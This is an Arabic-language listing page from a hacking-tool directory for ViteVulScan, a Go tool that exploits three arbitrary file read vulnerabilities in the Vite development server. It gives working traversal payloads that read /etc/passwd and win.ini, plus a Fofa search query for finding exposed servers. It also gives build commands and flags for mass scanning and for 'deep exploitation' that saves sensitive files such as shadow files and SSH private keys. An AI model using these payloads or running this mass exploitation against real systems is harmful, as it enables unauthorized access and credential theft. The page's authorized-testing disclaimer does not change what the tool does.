Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ViteVulScan — استغلال الثغرات الأمنية CVE-2025-30208 وCVE-2025-31125 | Kitploit
أدوات/GitHubGitHub/jackieya/vitevulscan
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالاختبار العشوائي
GitHubjackieya/vitevulscan

ViteVulScan

استغلال الثغرات الأمنية CVE-2025-30208 وCVE-2025-31125

عرض المستودع
719منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ViteVulScan

مقدمة عن الثغرات

يتضمن هذا المشروع 3 ثغرات: CVE-2025-30208/CVE-2025-31125/CVE-2025-31486، وجميعها تتعلق بثغرة قراءة الملفات التعسفية في خادم التطوير Vite. تتميز هذه الثغرات الثلاث بتغطية واسعة واستغلال بسيط وغير مقيد.

POC الثغرات:

CVE-2025-30208:

Windows: /@fs/C://Windows/win.ini?import&raw??

Linux: /@fs/etc/passwd?import&raw??

CVE-2025-31125

Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/etc/passwd?import&?inline=1.wasm?init

CVE-2025-31486

Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init

لا يلزم تضمين /@fs في المسار.

صيغة بحث Fofa:

body="/@vite/client"

شرح استخدام الأداة

ميزات الأداة

  1. يمكنها الربط مع fofa لإجراء استغلال جماعي
  2. تحلل المسار الدقيق الذي توجد به الثغرة ثم تقوم بالاستغلال العميق
  3. تستفيد بشكل كامل من خاصية التزامن في go، مما يتيح إجراء فحص جماعي سريع لعدد كبير من الأصول في وقت قصير

تعليمات البناء

إصدار go: go 1.20以上版本

انتقل إلى الدليل الجذري للمشروع

قم بمزامنة التبعيات أولاً

go mod tidy

ثم قم ببناء المشروع

go build -o ViteVulScan -ldflags="-s -w" -trimpath .

بعدها يمكن تشغيل السكربت عبر ./ViteVulScan.

بالطبع، يمكنك أيضًا تشغيل المشروع مباشرة من الدليل الجذري:

go run .

التكوين

يدعم السكربت الربط مع fofa للبحث عن الأصول ثم إجراء الفحص الجماعي.

لاستخدام fofa، تأكد من أن ملف app.ini والملف الثنائي المُجمَّع في نفس الدليل، وتحتاج إلى تعديل ملف app.ini الموجود في دليل config، حيث تضع fofakey الخاص بك في حقل fofakey، وnum هو العدد التقريبي للأصول التي تريد فحصها.

إذا كانت لديك صيغة بحث أفضل في fofa لهذه الثغرة، يمكنك تعديل حقل fofaQuery بنفسك.

شرح معاملات سطر الأوامر

Usage of ./ViteVulScan:

المعاملالوصف
-cveاستخدام أي ثغرة CVE للفحص. يدعم CVE_2025_30208/CVE_2025_31125/CVE_2025_31486. الافتراضي هو CVE_2025_30208.
-fofaتحديد هذا المعامل يربط الأداة مع fofa لمسح الأصول وإجراء فحص جماعي على الأصول المستهدفة
-u | -urlتحديد هدف URL واحد لفحصه
-f | -filenameتحديد اسم ملف لفحص عناوين URL الموجودة فيه بشكل جماعي
-eتحديد هذا المعامل يؤدي إلى الاستغلال العميق للأصول التي توجد بها الثغرة، وقراءة الملفات الحساسة المختلفة التي قد تكون موجودة وحفظها محليًا. (يرجى توخي الحذر عند استخدام هذه الميزة، ومن الأفضل فحص هدف واحد فقط، أي إضافة هذا المعامل عند استخدام -u)

ملاحظات

  1. للفحص الجماعي لجميع عناوين URL المستهدفة في ملف، يكفي التأكد من أن كل سطر في الملف يحتوي على عنوان URL واحد فقط. يمكن أن يكون الـ URL عنوانًا كاملًا يتضمن http، أو اسم نطاق أو عنوان IP، على سبيل المثال:

      http://example1.com 
      example2.com
      127.0.0.1
    
  2. عند إجراء الفحص بتحديد المعاملين -fofa و -f، سيتم حفظ الأصول التي توجد بها الثغرة تلقائيًا في الدليل الحالي، ويكون تنسيق اسم الملف "الطابع الزمني الحالي.csv".

  3. كما يدعم الاستغلال على منصتي Linux و Windows. القواميس المستخدمة هي linux_sensitive_path.txt و windows_sensitive_path.txt داخل دليل dict، وإذا كانت لديك المزيد من المسارات الحساسة، يمكنك إضافتها بنفسك في القواميس المقابلة.

أمثلة

مثال 1: الربط مع fofa للفحص الجماعي:

./ViteVulScan -fofa

image-20250410145741383

بعد انتهاء الفحص، ستجد في دليل result ملف CSV يحفظ عناوين URL التي نجح استغلالها، ويكون اسم الملف طابعًا زمنيًا:

image-20250410151756704

مثال 2: الاستغلال العميق لعنوان URL توجد به الثغرة:

./ViteVulScan -u example.com -e

image-20250410150341952

إذا ظهرت عبارة "استغلال ناجح"، يمكنك مراجعة دليل result، حيث سيكون هناك دليل باسم عنوان URL الذي تم فحصه، ويتم تحويل محتويات الملفات الحساسة الممسوحة إلى صيغة الملف الأصلية وحفظها في المسارات المقابلة، وتكون النتيجة كما يلي:

image-20250410150836985

بأخذ المحتوى المحفوظ في result/localhost:5173/etc/passwd كمثال، يمكن ملاحظة أن المحتوى الكامل للمعلومات الحساسة قد تم حفظه، مما يسهل الاستغلال اللاحق (إذا كان بالإمكان قراءة /etc/shadow أو المفتاح الخاص لـ ssh على الخادم، فيمكن استغلال ذلك بشكل أعمق).

image-20250410151044619

إخلاء المسؤولية

هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، يرجى عدم استخدامها لأغراض غير قانونية. يتحمل المستخدم وحده جميع العواقب الناتجة عن أي اختبار غير مصرح به يتم باستخدام هذه الأداة.

التحديثات

29 مارس - الإصدار الأول:

  • تنفيذ وظيفة جمع الأصول عبر fofa
  • تنفيذ التحقق الجماعي باستخدام ثغرة CVE_2025_30208
  • إضافة وظيفة تحليل سطر الأوامر

1 أبريل:

  • تنفيذ وظيفة الاستغلال العميق

2 أبريل:

  • إضافة التحقق من ثغرة CVE_2025_31125 الصادرة حديثًا

9 أبريل

  • إصلاح أخطاء وحدة fofa
  • إضافة خاصية التزامن لدعم الفحص الجماعي السريع لاكتشاف ما إذا كانت الأصول توجد بها ثغرات
  • إضافة التحقق من CVE_2025_31486
  • تعديل هيكل ملفات المشروع
تنزيل الأداة